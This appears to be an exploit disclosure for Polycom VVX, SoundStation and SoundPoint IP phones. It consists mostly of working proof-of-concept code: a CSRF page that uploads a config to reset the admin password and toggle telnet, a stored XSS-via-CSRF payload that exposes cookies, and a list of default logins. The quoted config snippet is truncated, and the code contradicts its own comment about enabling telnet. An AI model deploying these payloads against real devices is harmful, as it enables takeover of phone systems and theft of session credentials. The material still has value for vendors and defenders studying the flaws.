Phone Model | VVX 311 |
Part Number | 3111-48350-001 Rev:A |
MAC Address | X |
IP Mode | IPv4 |
IP Address | X |
UC Software Version | 5.9.1.0615 |
Updater Version | 5.9.7.12459 |
This gui seems to be similar or the same to the soundpoint, Most Post requests seem vulnerable to csrf. I can just take out the cookie login/pass that is in each request and craft a csrf. For example the following is a csrf example that changes the admin password and turns on telnet. This works for the VVX model however the same csrf did not work for the soundstation and soundpoint.
<html> <!-- Polycom VVX 5.9.1.0615 CSRF - Changes Admin pass to 123456. Also turns telnet on, login Polycom/123456 --> <body> <script>history.pushState('', '', '/')</script> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https:\/\/192.168.128.11\/form-submit\/Utilities\/configuration\/importFile", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------402251386101268401375671906"); xhr.withCredentials = true; var body = "-----------------------------402251386101268401375671906\r\n" + "Content-Disposition: form-data; name=\"myfile\"; filename=\"polycomtelnet.cfg\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\x3cdevice device.set=\"1\"\x3e\n" + "\x3cauth device.auth.localAdminPassword.set=\"1\" device.auth.localAdminPassword=\"123456\"/\x3e\n" + "\x3ctelnet diags.telnetd.enabled=\"0\"\x3e\x3c/telnet\x3e\n" + "\r\n" + "-----------------------------402251386101268401375671906--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> This sends a file called polycomtelnet.cfg which basically looks like this. <device device.set="1"> <auth device.auth. <telnet diags.telnetd.enabled="0"></
Phone Model | SoundStation IP 5000 & SoundPoint IP 335 (same firmware) |
Part Number | 3111-30900-001 Rev:H |
MAC Address | X |
IP Address | X |
UC Software Version | 4.0.14.1388 |
BootROM Software Version | 5.0.14.0580 |
This is a Post Xss via csrf that both the newest firmware of soundstation and soundpoint are vulnerable to. Given the simple Cookie: Authorization= having cookies exposed can make this easy to convert from base64.
<html> <!-- Post XSS via CSRF on Soundstation IP 5000 & SoundPoint IP 335 UC ver 4.0.14.1388 --> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.128.17/form-submit" method="POST"> <input type="hidden" name="250:1" value=""><Script>alert(document.cookie)</Script>" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Most of these devices come with default logins: user/123 admin/456 . However if the company setting these up has changed them these csrf vulnerabilities could be useful.